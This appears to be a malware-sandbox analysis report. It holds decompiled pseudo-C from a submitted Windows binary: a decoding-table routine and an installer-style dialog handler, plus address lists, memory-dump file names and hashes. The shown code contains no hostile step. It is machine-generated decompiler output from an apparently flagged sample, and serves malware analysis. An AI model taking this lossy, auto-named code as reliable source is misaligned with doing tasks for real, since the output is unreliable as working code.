                                                  					_t233 = _t233 - 1;
                                                  				} while (_t233 != 0);
                                                  				if(_v116 != _t278) {
                                                  					_t279 = _a28;
                                                  					_t267 =  *_t279;
                                                  					_t190 = 1;
                                                  					_a28 = _t267;
                                                  					_t234 = 0xf;
                                                  					while(1) {
                                                  						_t168 = 0;
                                                  						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                  							break;
                                                  						}
                                                  						_t190 = _t190 + 1;
                                                  						if(_t190 <= _t234) {
                                                  							continue;
                                                  						}
                                                  						break;
                                                  					}
                                                  					_v8 = _t190;
                                                  					if(_t267 < _t190) {
                                                  						_a28 = _t190;
                                                  					}
                                                  					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                  						_t234 = _t234 - 1;
                                                  						if(_t234 != 0) {
                                                  							continue;
                                                  						}
                                                  						break;
                                                  					}
                                                  					_v28 = _t234;
                                                  					if(_a28 > _t234) {
                                                  						_a28 = _t234;
                                                  					}
                                                  					 *_t279 = _a28;
                                                  					_t181 = 1 << _t190;
                                                  					while(_t190 < _t234) {
                                                  						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                  						if(_t182 < 0) {
                                                  							L64:
                                                  							return _t168 | 0xffffffff;
                                                  						}
                                                  						_t190 = _t190 + 1;
                                                  						_t181 = _t182 + _t182;
                                                  					}
                                                  					_t281 = _t234 << 2;
                                                  					_t191 = _t299 + _t281 - 0x70;
                                                  					_t269 =  *_t191;
                                                  					_t183 = _t181 - _t269;
                                                  					_v52 = _t183;
                                                  					if(_t183 < 0) {
                                                  						goto L64;
                                                  					}
                                                  					_v176 = _t168;
                                                  					 *_t191 = _t269 + _t183;
                                                  					_t192 = 0;
                                                  					_t235 = _t234 - 1;
                                                  					if(_t235 == 0) {
                                                  						L21:
                                                  						_t184 = _a4;
                                                  						_t271 = 0;
                                                  						do {
                                                  							_t193 =  *_t184;
                                                  							_t184 =  &(_t184[1]);
                                                  							if(_t193 != _t168) {
                                                  								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                  								_t236 =  *_t232;
                                                  								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                                  								 *_t232 = _t236 + 1;
                                                  							}
                                                  							_t271 = _t271 + 1;
                                                  						} while (_t271 < _a8);
                                                  						_v16 = _v16 | 0xffffffff;
                                                  						_v40 = _v40 & 0x00000000;
                                                  						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                  						_t195 = _v8;
                                                  						_t186 =  ~_a28;
                                                  						_v12 = _t168;
                                                  						_v180 = _t168;
                                                  						_v36 = 0x432190;
                                                  						_v240 = _t168;
                                                  						if(_t195 > _v28) {
                                                  							L62:
                                                  							_t168 = 0;
                                                  							if(_v52 == 0 || _v28 == 1) {
                                                  								return _t168;
                                                  							} else {
                                                  								goto L64;
                                                  							}
                                                  						}
                                                  						_v44 = _t195 - 1;
                                                  						_v32 = _t299 + _t195 * 4 - 0x70;
                                                  						do {
                                                  							_t282 =  *_v32;
                                                  							if(_t282 == 0) {
                                                  								goto L61;
                                                  							}
                                                  							while(1) {
                                                  								_t283 = _t282 - 1;
                                                  								_t200 = _a28 + _t186;
                                                  								_v48 = _t283;
                                                  								_v24 = _t200;
                                                  								if(_v8 <= _t200) {
                                                  									goto L45;
                                                  								}
                                                  								L31:
                                                  								_v20 = _t283 + 1;
                                                  								do {
                                                  									_v16 = _v16 + 1;
                                                  									_t296 = _v28 - _v24;
                                                  									if(_t296 > _a28) {
                                                  										_t296 = _a28;
                                                  									}
                                                  									_t222 = _v8 - _v24;
                                                  									_t254 = 1 << _t222;
                                                  									if(1 <= _v20) {
                                                  										L40:
                                                  										_t256 =  *_a36;
                                                  										_t168 = 1 << _t222;
                                                  										_v40 = 1;
                                                  										_t274 = _t256 + 1;
                                                  										if(_t274 > 0x5a0) {
                                                  											goto L64;
                                                  										}
                                                  									} else {
                                                  										_t275 = _v32;
                                                  										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                  										if(_t222 >= _t296) {
                                                  											goto L40;
                                                  										}
                                                  										while(1) {
                                                  											_t222 = _t222 + 1;
                                                  											if(_t222 >= _t296) {
                                                  												goto L40;
                                                  											}
                                                  											_t275 = _t275 + 4;
                                                  											_t264 = _t263 + _t263;
                                                  											_t175 =  *_t275;
                                                  											if(_t264 <= _t175) {
                                                  												goto L40;
                                                  											}
                                                  											_t263 = _t264 - _t175;
                                                  										}
                                                  										goto L40;
                                                  									}
                                                  									_t168 = _a32 + _t256 * 4;
                                                  									_t297 = _t299 + _v16 * 4 - 0xec;
                                                  									 *_a36 = _t274;
                                                  									_t259 = _v16;
                                                  									 *_t297 = _t168;
                                                  									if(_t259 == 0) {
                                                  										 *_a24 = _t168;
                                                  									} else {
                                                  										_t276 = _v12;
                                                  										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                  										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                  										_a5 = _a28;
                                                  										_a4 = _t222;
                                                  										_t262 = _t276 >> _t186;
                                                  										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                  										 *(_t298 + _t262 * 4) = _a4;
                                                  									}
                                                  									_t224 = _v24;
                                                  									_t186 = _t224;
                                                  									_t225 = _t224 + _a28;
                                                  									_v24 = _t225;
                                                  								} while (_v8 > _t225);
                                                  								L45:
                                                  								_t284 = _v36;
                                                  								_a5 = _v8 - _t186;
                                                  								if(_t284 < 0x432190 + _a8 * 4) {
                                                  									_t205 =  *_t284;
                                                  									if(_t205 >= _a12) {
                                                  										_t207 = _t205 - _a12 + _t205 - _a12;
                                                  										_v36 =  &(_v36[1]);
                                                  										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                  										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                  									} else {
                                                  										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                  										_t208 =  *_t284;
                                                  										_v36 =  &(_t284[1]);
                                                  									}
                                                  									_a6 = _t208;
                                                  								} else {
                                                  									_a4 = 0xc0;
                                                  								}
                                                  								_t286 = 1 << _v8 - _t186;
                                                  								_t244 = _v12 >> _t186;
                                                  								while(_t244 < _v40) {
                                                  									 *(_t168 + _t244 * 4) = _a4;
                                                  									_t244 = _t244 + _t286;
                                                  								}
                                                  								_t287 = _v12;
                                                  								_t246 = 1 << _v44;
                                                  								while((_t287 & _t246) != 0) {
                                                  									_t287 = _t287 ^ _t246;
                                                  									_t246 = _t246 >> 1;
                                                  								}
                                                  								_t288 = _t287 ^ _t246;
                                                  								_v20 = 1;
                                                  								_v12 = _t288;
                                                  								_t251 = _v16;
                                                  								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                  									L60:
                                                  									if(_v48 != 0) {
                                                  										_t282 = _v48;
                                                  										_t283 = _t282 - 1;
                                                  										_t200 = _a28 + _t186;
                                                  										_v48 = _t283;
                                                  										_v24 = _t200;
                                                  										if(_v8 <= _t200) {
                                                  											goto L45;
                                                  										}
                                                  										goto L31;
                                                  									}
                                                  									break;
                                                  								} else {
                                                  									goto L58;
                                                  								}
                                                  								do {
                                                  									L58:
                                                  									_t186 = _t186 - _a28;
                                                  									_t251 = _t251 - 1;
                                                  								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                  								_v16 = _t251;
                                                  								goto L60;
                                                  							}
                                                  							L61:
                                                  							_v8 = _v8 + 1;
                                                  							_v32 = _v32 + 4;
                                                  							_v44 = _v44 + 1;
                                                  						} while (_v8 <= _v28);
                                                  						goto L62;
                                                  					}
                                                  					_t277 = 0;
                                                  					do {
                                                  						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                  						_t277 = _t277 + 4;
                                                  						_t235 = _t235 - 1;
                                                  						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                  					} while (_t235 != 0);
                                                  					goto L21;
                                                  				}
                                                  				 *_a24 =  *_a24 & 0x00000000;
                                                  				 *_a28 =  *_a28 & 0x00000000;
                                                  				return 0;
                                                  			}











































































                                                  0x00407567
                                                  0x0040756f
                                                  0x00407573
                                                  0x00407575
                                                  0x00407578
                                                  0x0040757a
                                                  0x0040757a
                                                  0x0040757c
                                                  0x00407583
                                                  0x00407585
                                                  0x00407585
                                                  0x0040758b
                                                  0x004075a0
                                                  0x004075a8
                                                  0x004075aa
                                                  0x004075ac
                                                  0x004075af
                                                  0x004075b0
                                                  0x004075b0
                                                  0x004075b6
                                                  0x00000000
                                                  0x00000000
                                                  0x004075b8
                                                  0x004075bb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004075bb
                                                  0x004075bf
                                                  0x004075c2
                                                  0x004075c4
                                                  0x004075c4
                                                  0x004075c7
                                                  0x004075cd
                                                  0x004075ce
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004075ce
                                                  0x004075d3
                                                  0x004075d6
                                                  0x004075d8
                                                  0x004075d8
                                                  0x004075de
                                                  0x004075e0
                                                  0x004075f1
                                                  0x004075e4
                                                  0x004075e8
                                                  0x0040788d
                                                  0x00000000
                                                  0x0040788d
                                                  0x004075ee
                                                  0x004075ef
                                                  0x004075ef
                                                  0x004075f7
                                                  0x004075fa
                                                  0x004075fe
                                                  0x00407600
                                                  0x00407602
                                                  0x00407605
                                                  0x00000000
                                                  0x00000000
                                                  0x0040760d
                                                  0x00407613
                                                  0x00407615
                                                  0x00407617
                                                  0x00407618
                                                  0x0040762d
                                                  0x0040762d
                                                  0x00407630
                                                  0x00407632
                                                  0x00407632
                                                  0x00407634
                                                  0x00407639
                                                  0x0040763b
                                                  0x00407642
                                                  0x00407644
                                                  0x0040764c
                                                  0x0040764c
                                                  0x0040764e
                                                  0x0040764f
                                                  0x0040765e
                                                  0x00407662
                                                  0x00407666
                                                  0x00407669
                                                  0x0040766c
                                                  0x00407671
                                                  0x00407674
                                                  0x0040767a
                                                  0x00407681
                                                  0x00407687
                                                  0x00407880
                                                  0x00407880
                                                  0x00407885
                                                  0x00407894
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407885
                                                  0x00407694
                                                  0x00407697
                                                  0x0040769a
                                                  0x0040769d
                                                  0x004076a1
                                                  0x00000000
                                                  0x00000000
                                                  0x004076ac
                                                  0x004076af
                                                  0x004076b0
                                                  0x004076b2
                                                  0x004076b8
                                                  0x004076bb
                                                  0x00000000
                                                  0x00000000
                                                  0x004076c1
                                                  0x004076c2
                                                  0x004076c5
                                                  0x004076c8
                                                  0x004076cb
                                                  0x004076d1
                                                  0x004076d3
                                                  0x004076d3
                                                  0x004076db
                                                  0x004076df
                                                  0x004076e4
                                                  0x00407709
                                                  0x0040770f
                                                  0x00407711
                                                  0x00407713
                                                  0x00407716
                                                  0x0040771f
                                                  0x00000000
                                                  0x00000000
                                                  0x004076e6
                                                  0x004076e6
                                                  0x004076ef
                                                  0x004076f3
                                                  0x00000000
                                                  0x00000000
                                                  0x00407704
                                                  0x00407704
                                                  0x00407707
                                                  0x00000000
                                                  0x00000000
                                                  0x004076f7
                                                  0x004076fa
                                                  0x004076fc
                                                  0x00407700
                                                  0x00000000
                                                  0x00000000
                                                  0x00407702
                                                  0x00407702
                                                  0x00000000
                                                  0x00407704
                                                  0x00407728
                                                  0x0040772e
                                                  0x00407738
                                                  0x0040773a
                                                  0x0040773f
                                                  0x00407741
                                                  0x00407777
                                                  0x00407743
                                                  0x00407743
                                                  0x00407746
                                                  0x00407749
                                                  0x00407753
                                                  0x00407756
                                                  0x0040775d
                                                  0x00407768
                                                  0x0040776f
                                                  0x0040776f
                                                  0x00407779
                                                  0x0040777c
                                                  0x0040777e
                                                  0x00407784
                                                  0x00407784
                                                  0x0040778d
                                                  0x00407790
                                                  0x00407795
                                                  0x004077a4
                                                  0x004077ac
                                                  0x004077b1
                                                  0x004077d5
                                                  0x004077dd
                                                  0x004077e1
                                                  0x004077e7
                                                  0x004077b3
                                                  0x004077c1
                                                  0x004077c4
                                                  0x004077ca
                                                  0x004077ca
                                                  0x004077eb
                                                  0x004077a6
                                                  0x004077a6
                                                  0x004077a6
                                                  0x004077fc
                                                  0x00407800
                                                  0x0040780c
                                                  0x00407807
                                                  0x0040780a
                                                  0x0040780a
                                                  0x00407814
                                                  0x00407819
                                                  0x00407821
                                                  0x0040781d
                                                  0x0040781f
                                                  0x0040781f
                                                  0x00407827
                                                  0x00407829
                                                  0x00407830
                                                  0x0040783a
                                                  0x00407844
                                                  0x00407860
                                                  0x00407864
                                                  0x004076a9
                                                  0x004076af
                                                  0x004076b0
                                                  0x004076b2
                                                  0x004076b8
                                                  0x004076bb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004076bb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407846
                                                  0x00407846
                                                  0x00407846
                                                  0x0040784b
                                                  0x00407854
                                                  0x0040785d
                                                  0x00000000
                                                  0x0040785d
                                                  0x0040786a
                                                  0x0040786a
                                                  0x0040786d
                                                  0x00407874
                                                  0x00407877
                                                  0x00000000
                                                  0x0040769a
                                                  0x0040761a
                                                  0x0040761c
                                                  0x0040761c
                                                  0x00407620
                                                  0x00407623
                                                  0x00407624
                                                  0x00407624
                                                  0x00000000
                                                  0x0040761c
                                                  0x00407590
                                                  0x00407596
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                  • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                  • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                  • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                  				struct HWND__* _v8;
                                                  				struct HWND__* _v12;
                                                  				long _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				intOrPtr _v28;
                                                  				signed char* _v32;
                                                  				int _v36;
                                                  				signed int _v44;
                                                  				int _v48;
                                                  				signed int* _v60;
                                                  				signed char* _v64;
                                                  				signed int _v68;
                                                  				long _v72;
                                                  				void* _v76;
                                                  				intOrPtr _v80;
                                                  				intOrPtr _v84;
                                                  				void* _v88;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t198;
                                                  				intOrPtr _t201;
                                                  				intOrPtr _t202;
                                                  				long _t207;
                                                  				signed int _t211;
                                                  				signed int _t222;
                                                  				void* _t225;
                                                  				void* _t226;
                                                  				int _t232;
                                                  				long _t237;
                                                  				long _t238;
                                                  				signed int _t239;
                                                  				signed int _t245;
                                                  				signed int _t247;
                                                  				signed char _t248;
                                                  				signed char _t254;
                                                  				void* _t258;
                                                  				void* _t260;
                                                  				signed char* _t278;
                                                  				signed char _t279;
                                                  				long _t284;
                                                  				struct HWND__* _t291;
                                                  				signed int* _t292;
                                                  				int _t293;
                                                  				long _t294;
                                                  				signed int _t295;
                                                  				void* _t297;
                                                  				long _t298;
                                                  				int _t299;
                                                  				signed int _t300;
                                                  				signed int _t303;
                                                  				signed int _t311;
                                                  				signed char* _t319;
                                                  				int _t324;
                                                  				void* _t326;
                                                  
                                                  				_t291 = _a4;
                                                  				_v12 = GetDlgItem(_t291, 0x3f9);
                                                  				_v8 = GetDlgItem(_t291, 0x408);
                                                  				_t326 = SendMessageW;
                                                  				_v24 =  *0x434f28;
                                                  				_v28 =  *0x434f10 + 0x94;
                                                  				if(_a8 != 0x110) {
                                                  					L23:
                                                  					if(_a8 != 0x405) {
                                                  						_t301 = _a16;
                                                  					} else {
                                                  						_a12 = 0;
                                                  						_t301 = 1;
                                                  						_a8 = 0x40f;
                                                  						_a16 = 1;
                                                  					}
                                                  					if(_a8 == 0x4e || _a8 == 0x413) {
                                                  						_v16 = _t301;
                                                  						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                  							if(( *0x434f19 & 0x00000002) != 0) {
                                                  								L41:
                                                  								if(_v16 != 0) {
                                                  									_t237 = _v16;
                                                  									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                  										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                  									}
                                                  									_t238 = _v16;
                                                  									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                  										_t301 = _v24;
                                                  										_t239 =  *(_t238 + 0x5c);
                                                  										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                  											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                  										} else {
                                                  											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                  										}
                                                  									}
                                                  								}
                                                  								goto L48;
                                                  							}
                                                  							if(_a8 == 0x413) {
                                                  								L33:
                                                  								_t301 = 0 | _a8 != 0x00000413;
                                                  								_t245 = E00404E54(_v8, _a8 != 0x413);
                                                  								_t295 = _t245;
                                                  								if(_t295 >= 0) {
                                                  									_t94 = _v24 + 8; // 0x8
                                                  									_t301 = _t245 * 0x818 + _t94;
                                                  									_t247 =  *_t301;
                                                  									if((_t247 & 0x00000010) == 0) {
                                                  										if((_t247 & 0x00000040) == 0) {
                                                  											_t248 = _t247 ^ 0x00000001;
                                                  										} else {
                                                  											_t254 = _t247 ^ 0x00000080;
                                                  											if(_t254 >= 0) {
                                                  												_t248 = _t254 & 0x000000fe;
                                                  											} else {
                                                  												_t248 = _t254 | 0x00000001;
                                                  											}
                                                  										}
                                                  										 *_t301 = _t248;
                                                  										E0040117D(_t295);
                                                  										_a12 = _t295 + 1;
                                                  										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                                                  										_a8 = 0x40f;
                                                  									}
                                                  								}
                                                  								goto L41;
                                                  							}
                                                  							_t301 = _a16;
                                                  							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                  								goto L41;
                                                  							}
                                                  							goto L33;
                                                  						} else {
                                                  							goto L48;
                                                  						}
                                                  					} else {
                                                  						L48:
                                                  						if(_a8 != 0x111) {
                                                  							L56:
                                                  							if(_a8 == 0x200) {
                                                  								SendMessageW(_v8, 0x200, 0, 0);
                                                  							}
                                                  							if(_a8 == 0x40b) {
                                                  								_t225 =  *0x42d24c;
                                                  								if(_t225 != 0) {
                                                  									ImageList_Destroy(_t225);
                                                  								}
                                                  								_t226 =  *0x42d260;
                                                  								if(_t226 != 0) {
                                                  									GlobalFree(_t226);
                                                  								}
                                                  								 *0x42d24c = 0;
                                                  								 *0x42d260 = 0;
                                                  								 *0x434f60 = 0;
                                                  							}
                                                  							if(_a8 != 0x40f) {
                                                  								L90:
                                                  								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                                                  									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                  									ShowWindow(_v8, _t324);
                                                  									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                  								}
                                                  								goto L93;
                                                  							} else {
                                                  								E004011EF(_t301, 0, 0);
                                                  								_t198 = _a12;
                                                  								if(_t198 != 0) {
                                                  									if(_t198 != 0xffffffff) {
                                                  										_t198 = _t198 - 1;
                                                  									}
                                                  									_push(_t198);
                                                  									_push(8);
                                                  									E00404ED4();
                                                  								}
                                                  								if(_a16 == 0) {
                                                  									L75:
                                                  									E004011EF(_t301, 0, 0);
                                                  									_v36 =  *0x42d260;
                                                  									_t201 =  *0x434f28;
                                                  									_v64 = 0xf030;
                                                  									_v24 = 0;
                                                  									if( *0x434f2c <= 0) {
                                                  										L86:
                                                  										if( *0x434fbe == 0x400) {
                                                  											InvalidateRect(_v8, 0, 1);
                                                  										}
                                                  										_t202 =  *0x433edc; // 0x874466
                                                  										if( *((intOrPtr*)(_t202 + 0x10)) != 0) {
                                                  											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                                                  										}
                                                  										goto L90;
                                                  									}
                                                  									_t292 = _t201 + 8;
                                                  									do {
                                                  										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                  										if(_t207 != 0) {
                                                  											_t303 =  *_t292;
                                                  											_v72 = _t207;
                                                  											_v76 = 8;
                                                  											if((_t303 & 0x00000001) != 0) {
                                                  												_v76 = 9;
                                                  												_v60 =  &(_t292[4]);
                                                  												_t292[0] = _t292[0] & 0x000000fe;
                                                  											}
                                                  											if((_t303 & 0x00000040) == 0) {
                                                  												_t211 = (_t303 & 0x00000001) + 1;
                                                  												if((_t303 & 0x00000010) != 0) {
                                                  													_t211 = _t211 + 3;
                                                  												}
                                                  											} else {
                                                  												_t211 = 3;
                                                  											}
                                                  											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                  											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                  											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                  										}
                                                  										_v24 = _v24 + 1;
                                                  										_t292 =  &(_t292[0x206]);
                                                  									} while (_v24 <  *0x434f2c);
                                                  									goto L86;
                                                  								} else {
                                                  									_t293 = E004012E2( *0x42d260);
                                                  									E00401299(_t293);
                                                  									_t222 = 0;
                                                  									_t301 = 0;
                                                  									if(_t293 <= 0) {
                                                  										L74:
                                                  										SendMessageW(_v12, 0x14e, _t301, 0);
                                                  										_a16 = _t293;
                                                  										_a8 = 0x420;
                                                  										goto L75;
                                                  									} else {
                                                  										goto L71;
                                                  									}
                                                  									do {
                                                  										L71:
                                                  										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                  											_t301 = _t301 + 1;
                                                  										}
                                                  										_t222 = _t222 + 1;
                                                  									} while (_t222 < _t293);
                                                  									goto L74;
                                                  								}
                                                  							}
                                                  						}
                                                  						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                  							goto L93;
                                                  						} else {
                                                  							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                  							if(_t232 == 0xffffffff) {
                                                  								goto L93;
                                                  							}
                                                  							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                  							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                  								_t294 = 0x20;
                                                  							}
                                                  							E00401299(_t294);
                                                  							SendMessageW(_a4, 0x420, 0, _t294);
                                                  							_a12 = _a12 | 0xffffffff;
                                                  							_a16 = 0;
                                                  							_a8 = 0x40f;
                                                  							goto L56;
                                                  						}
                                                  					}
                                                  				} else {
                                                  					_v36 = 0;
                                                  					_v20 = 2;
                                                  					 *0x434f60 = _t291;
                                                  					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                  					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                                  					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                                  					_t297 = _t258;
                                                  					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                                                  					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                  					 *0x42d24c = _t260;
                                                  					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                  					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                                                  					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                  						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                  					}
                                                  					DeleteObject(_t297);
                                                  					_t298 = 0;
                                                  					do {
                                                  						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                  						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                  							if(_t298 != 0x20) {
                                                  								_v20 = 0;
                                                  							}
                                                  							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                                                  						}
                                                  						_t298 = _t298 + 1;
                                                  					} while (_t298 < 0x21);
                                                  					_t299 = _a16;
                                                  					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                  					_push(0x15);
                                                  					E00404499(_a4);
                                                  					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                  					_push(0x16);
                                                  					E00404499(_a4);
                                                  					_t300 = 0;
                                                  					_v16 = 0;
                                                  					if( *0x434f2c <= 0) {
                                                  						L19:
                                                  						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                  						goto L20;
                                                  					} else {
                                                  						_t319 = _v24 + 8;
                                                  						_v32 = _t319;
                                                  						do {
                                                  							_t278 =  &(_t319[0x10]);
                                                  							if( *_t278 != 0) {
                                                  								_v64 = _t278;
                                                  								_t279 =  *_t319;
                                                  								_v88 = _v16;
                                                  								_t311 = 0x20;
                                                  								_v84 = 0xffff0002;
                                                  								_v80 = 0xd;
                                                  								_v68 = _t311;
                                                  								_v44 = _t300;
                                                  								_v72 = _t279 & _t311;
                                                  								if((_t279 & 0x00000002) == 0) {
                                                  									if((_t279 & 0x00000004) == 0) {
                                                  										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                  									} else {
                                                  										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                  									}
                                                  								} else {
                                                  									_v80 = 0x4d;
                                                  									_v48 = 1;
                                                  									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                  									_v36 = 1;
                                                  									 *( *0x42d260 + _t300 * 4) = _t284;
                                                  									_v16 =  *( *0x42d260 + _t300 * 4);
                                                  								}
                                                  							}
                                                  							_t300 = _t300 + 1;
                                                  							_t319 =  &(_v32[0x818]);
                                                  							_v32 = _t319;
                                                  						} while (_t300 <  *0x434f2c);
                                                  						if(_v36 != 0) {
                                                  							L20:
                                                  							if(_v20 != 0) {
                                                  								E004044CE(_v8);
                                                  								goto L23;
                                                  							} else {
                                                  								ShowWindow(_v12, 5);
                                                  								E004044CE(_v12);
                                                  								L93:
                                                  								return E00404500(_a8, _a12, _a16);
                                                  							}
                                                  						}
                                                  						goto L19;
                                                  					}
                                                  				}
                                                  			}



























































                                                  0x00404f0d
                                                  0x00404f26
                                                  0x00404f2b
                                                  0x00404f33
                                                  0x00404f39
                                                  0x00404f4f
                                                  0x00404f52
                                                  0x0040517d
                                                  0x00405184
                                                  0x00405198
                                                  0x00405186
                                                  0x00405188
                                                  0x0040518b
                                                  0x0040518c
                                                  0x00405193
                                                  0x00405193
                                                  0x004051a4
                                                  0x004051b2
                                                  0x004051b5
                                                  0x004051cb
                                                  0x00405240
                                                  0x00405243
                                                  0x00405245
                                                  0x0040524f
                                                  0x0040525d
                                                  0x0040525d
                                                  0x0040525f
                                                  0x00405269
                                                  0x0040526f
                                                  0x00405272
                                                  0x00405275
                                                  0x00405290
                                                  0x00405277
                                                  0x00405281
                                                  0x00405281
                                                  0x00405275
                                                  0x00405269
                                                  0x00000000
                                                  0x00405243
                                                  0x004051d0
                                                  0x004051db
                                                  0x004051e0
                                                  0x004051e7
                                                  0x004051ec
                                                  0x004051f0
                                                  0x004051fb
                                                  0x004051fb
                                                  0x004051ff
                                                  0x00405203
                                                  0x00405207
                                                  0x0040521a
                                                  0x00405209
                                                  0x00405209
                                                  0x00405210
                                                  0x00405216
                                                  0x00405212
                                                  0x00405212
                                                  0x00405212
                                                  0x00405210
                                                  0x0040521e
                                                  0x00405220
                                                  0x00405233
                                                  0x00405236
                                                  0x00405239
                                                  0x00405239
                                                  0x00405203
                                                  0x00000000
                                                  0x004051f0
                                                  0x004051d2
                                                  0x004051d9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405293
                                                  0x00405293
                                                  0x0040529a
                                                  0x0040530b
                                                  0x00405313
                                                  0x0040531b
                                                  0x0040531b
                                                  0x00405324
                                                  0x00405326
                                                  0x0040532d
